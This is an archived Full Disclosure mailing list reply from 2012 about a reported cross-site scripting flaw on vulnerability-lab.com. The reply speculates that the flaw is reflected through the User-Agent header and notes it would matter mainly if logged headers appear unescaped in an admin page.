Full Disclosure mailing list archives
Re: Vulnerability-lab.com XSS
From: Ferenc Kovacs <tyra3l () gmail com>
Date: Sun, 5 Feb 2012 21:09:45 +0100
On Fri, Feb 3, 2012 at 4:21 PM, Luis Santana <hacktalk () hacktalk net> wrote:
Earlier today I tried to contact the people over at http://vulnerability-lab.com about an XSS vulnerability I found on their site (ironic) but it appears they want nothing to do with me. Praise Full-Disclosure. [image: Vulnerability-lab.com XSS - HackTalk Security]<http://i.imgur.com/CripA.jpg> http://i.imgur.com/CripA.jpg The Irony Of A Site For Disclosing Site Being Itself Vuln To Something So Trivial Basically I tried to report this issue to them through a private message on youtube and then a follow request on twitter (so I could DM them) but to no avail. Eventually rem0ve joined freenode and messaged me and told me he didn’t want to be cooperative with me or even be friendly. Sometimes being a prick just makes you look like an idiot. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Judging from the screenshot, it seems to be a reflected XSS through the User-Agent field. I would be curious how could this be exploited from the client side as you can't manipulate other visitors User-Agent header. Of course if the User-Agent is logged and the admin area which displays the logs has the same defect, then this is a different story. -- Ferenc Kovács @Tyr43l - http://tyrael.hu
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vulnerability-lab.com XSS Luis Santana (Feb 03)
- Re: Vulnerability-lab.com XSS Ferenc Kovacs (Feb 05)
- <Possible follow-ups>
- Re: Vulnerability-lab.com XSS doomxd () gmail com (Feb 03)
- Re: Vulnerability-lab.com XSS doc mombasa (Feb 04)
- Re: Vulnerability-lab.com XSS Valdis . Kletnieks (Feb 04)
- Re: Vulnerability-lab.com XSS Sanguinarious Rose (Feb 06)
- Re: Vulnerability-lab.com XSS Ian Hayes (Feb 06)
- Re: Vulnerability-lab.com XSS Sanguinarious Rose (Feb 06)
- Re: Vulnerability-lab.com XSS Valdis . Kletnieks (Feb 06)
- Vulnerability-lab.com XSS lulzlab (Feb 05)
- Re: Vulnerability-lab.com XSS RandallM (Feb 05)
- Re: Vulnerability-lab.com XSS Luis Santana (Feb 06)